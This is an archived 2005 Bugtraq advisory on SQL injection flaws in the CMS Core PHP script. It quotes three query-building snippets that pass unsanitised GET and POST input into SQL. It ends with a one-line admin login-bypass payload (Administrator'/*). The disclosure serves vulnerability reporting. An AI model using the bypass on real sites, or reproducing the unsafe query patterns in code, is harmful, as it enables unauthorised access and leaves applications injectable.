lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050209141547.28518.qmail@www.securityfocus.com>
Date: 9 Feb 2005 14:15:47 -0000
From: foster GHC <foster@....ru>
To: bugtraq@...urityfocus.com
Subject: CMS Core SQL injection




// GHC -> CMS CORE <- ADVISORY
// Product: CMS Core
// URL: http://chipmunk-scripts.com/scripts/cmscore.php
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[1] script name: index.php

---[code]---
$EntryID=$_GET['EntryID'];
...
$article="SELECT * FROM CMS_articles where EntryID='$EntryID'";
---[/code]---

Possible SQL injection http://CMScore/index.php?EntryID=[SQL code]

[2] script name: index.php

---[code]---
$searchterm=$_POST[searchterm];
...
$newselect="Select * FROM CMS_articles where title LIKE %$searchterm% OR shortdescription 
LIKE %$searchterm% OR body LIKE %$searchterm% order by EntryID DESC LIMIT $start, 
$numentries";
---[/code]---

Possible SQL injection through $searchterm variable in Search form.

[3] script name: admin/authenticate.php

---[code]---
  $username=$_POST['username'];
  $password=$_POST['password'];
  $password=md5($password);
  $query = "select * from CMS_logintable where username='$username' and password='$password'"; 
  $result=mysql_query($query) or die("Could not Query");
---[/code]---

Possible SQL injection through $username variable.

[exploit]
Log in with username
Administrator'/*
from admin/index.php page.

[note]
"Administrator" must be a valid user name.

/* ================================================== */
/* www.ghc.ru -- security games & challenges */
/* ================================================== */
/* greets to: 1dt.w0lf & RST.void.ru, D0G4 */
/* & all quest hunters %) */
/* ================================================== */


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ